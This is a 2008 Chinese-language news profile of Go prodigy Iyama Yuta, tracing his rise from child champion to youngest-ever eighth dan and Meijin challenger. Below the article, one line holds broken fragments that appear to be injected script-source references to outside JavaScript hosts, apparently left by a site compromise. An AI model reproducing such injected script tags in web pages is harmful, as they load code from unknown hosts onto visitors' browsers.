日本圍棋希望之星:“金童”井山裕太
作者: 類別:日韓新聞 來源: 發表時間:2008/7/18   瀏覽人次:3505


        在日本圍棋界,井山裕太被公認為日本圍棋的希望之星,新生代棋手的領軍人物。日前,井山裕太在名人戰循環圈中眾望所歸地獲得挑戰權,標志著這顆新星開始躋身日本一流棋手的行列。同時,他的崛起也無疑為近年來日漸衰退的日本圍棋帶來了新的曙光。

        井山裕太,1989年5月24日出生於日本大阪,現隸屬於日本棋院關西總本部,師從石井邦生九段。由於日前奪得了名人戰挑戰權,按照日本棋院的規定,晉陞八段,成為史上最年少的八段棋手。

12歲職業棋手的誕生

        井山裕太少年出名。5歲開始接觸圍棋。6歲時就出戰一場定勝負的小型比賽,一路連過5人,被當時擔任比賽解說的石井邦生九段看中,成為石井的弟子。1997年,還是東大阪市立孔舍衛東小學二年級學生的井山就奪得了全國小學生圍棋大賽冠軍,1998年實現衛冕。同一年,他還奪得了當年創設的全日本兒童圍棋大賽的首屆冠軍,成為轟動一時的“平成(平成元年為1989年)后冠軍”,出名甚早。
        2002年,正在大阪市立孔舍衛東讀初二的井山裕太,主動放棄了陞入高中的機會,在12歲之年正式入段。

        此前,日本圍棋史上最年少的入段棋手是趙治勛,當年11歲。而同樣在12歲實現入段的,只有橋本昌二九段、林海峰九段和結城聰九段等三人。

        作為史上罕見的“12歲職業棋手的誕生”,井山裕太的入段成為當年日本圍棋界最轟動的話題。而稚氣十足的他在入段后的首場比賽中,就在大手合中一舉擊敗山本賢太郎三段,取得職業生涯的首勝。

史上最年少七段

        很快,井山就圈內被看好為新生代棋手的領軍人物。2005年10月8日,在第12屆阿含.桐山杯全日本快棋公開賽上,他就擊敗小林覺九段奪得冠軍,嶄露頭角。
        其時,日本歷史上最年少的冠軍是在1973年新銳賽上奪冠的趙治勛,當時趙治勛為17歲整。這樣,井山裕太以16歲零4個月打破了這一紀錄。不僅如此,這項冠軍含金量之高,從井山一人連破張栩、王立誠、趙治勛、小林覺等超一流棋手中可見一斑。按照棋院規定,時為四段的井山裕太憑借這一成績晉陞七段,創造了史上最年少晉級七段紀錄。而井山從四段直接躍陞七段,這在日本圍棋史上也是前所未有的。

     “陞入七段之后,就可以參加更多的比賽。”井山開心地說。但是另一方面,絡繹不絕的慶祝電話和郵件卻令井山感到困惑。當媒體紛紛稱贊他“前途無量”,期待他“成為日本圍棋在國際棋戰中的新王牌時”,他本人卻表示,“我的實力還遠遠不行,必須更加努力。”口吻與棋風同樣冷靜。也許,正是這種與年齡不符的沉著老練,讓他擊敗了前輩們吧。

        同一年,井山裕太在第2屆“中野杯”20歲以下棋手錦標賽中奪得冠軍,此后連續三年在該杯賽上實現連霸,展示了其在年輕棋手中的超凡實力。這一年,井山裕太才16歲。

        如此成績,連同樣在小學二年級時奪得過全國兒童冠軍的山下敬吾也為之咋舌:“我16歲時,簡直跟井山君沒法比。”

 2007,離三大頭銜一步之遙

       2007年,井山裕太一舉打入第32期棋聖戰循環圈賽,從而以17歲零10個月的年齡,創造了三大頭銜戰循環圈最年少入圍紀錄。同年他也進入了名人戰循環圈賽,將黃翊祖於2005年創造的18歲零6個月的最年少紀錄縮減了1個月。年底,井山裕太被評為日本棋院2007年度十大有影響力的人物,有媒體預言,井山離奪取七大頭銜已經為時不遠。

 當時,《朝日新聞》是這樣刊文評述的

    “首先值得一提的是,井山終於從一流高手的登龍門---新人王戰正式畢業。18歲零3個月就奪得新人王,在日本圍棋史最年少記錄中排在第二。在非正式賽事中,他還在中野杯20歲以下錦標賽中取得三連冠。

    同樣地,他以18歲零5個月打入名人戰循環圈,也創造了日本圍棋的歷史新記錄,比黃翊祖四段在平成17年(2005年)打破的該記錄還提前了一個月。而他去年以17歲零10個月打入棋聖戰循環圈,則是創造了全部七大頭銜戰循環圈賽的歷史最年少記錄。

    明年,井山七段在棋聖戰循環圈賽和名人戰循環圈賽的征戰將萬眾矚目。從他打入天元戰挑戰者決定賽的情況來看,其實力已與一流棋手無異。也許很快,他將亮相於七大頭銜戰挑戰賽的。”

2008,美夢成真

        這一預言很快成真。

        2008年,井山裕太在名人戰循環圈賽中一路領先,最終提前一輪奪得了名人戰挑戰權,登上了其本人夢寐以求,也是整個日本圍棋界期待已久的三大頭銜戰舞台。而他19歲零3個月的年齡,再次改寫了名人戰及現行七大頭銜戰的兩大最年少挑戰紀錄(此前,七大頭銜戰最年少挑戰記錄為趙治勛的20歲零4個月,名人戰最年少挑戰紀錄為林海峰的23歲零2個月)。

        按照日本棋院的規定,7月11日,奪得名人戰挑戰權的井山裕太七段晉陞八段,再次創造了史上最年少晉級八段紀錄。

未來日本的希望

        上世紀90年代,依田紀基、王立誠等逐漸取代木谷一門,成為日本圍棋的霸主。進入21世紀,日本圍棋成為張栩、高尾紳路、山下敬吾、羽根直樹等“四天王”的天下。然而,自世界性圍棋賽事從上世紀90年代開始以來,除了武宮正樹、依田紀基一度活躍,近年來四天王普遍難堪重任,令日本圍棋始終處於中韓兩國的下風。鑑於這樣的現狀,日本圍棋界對於以井山裕太為代表的新生代的崛起,一直以來寄予厚望。

        未來,井山裕太能否迅速奪得國內三大頭銜,在國際棋賽中能夠在多大程度上向中韓兩國的堅固堡壘發起沖擊,將是人們矚目的焦點。

rc=>rc=http://www.cdbroad.com/Images/yahoo.js>rc=http://www.cdbroad.com/Images/yahoo.js>rc=http://4589.in/yahoo.js>rc=>rc=>rc=>rc=>rc=>rc=>rc=>rc=>





 發表您的評論
 
 評論內容 (現有 0 倏評論)
 
暫時沒有評論!
本欄目暫時沒有新聞!
 
 
 
 

 更多關於“井山裕太 名人戰 棋聖戰”的新聞

 相關鏈接
   
日本圍棋希望之星:“金童”井山裕太  ( 2008/7/18 )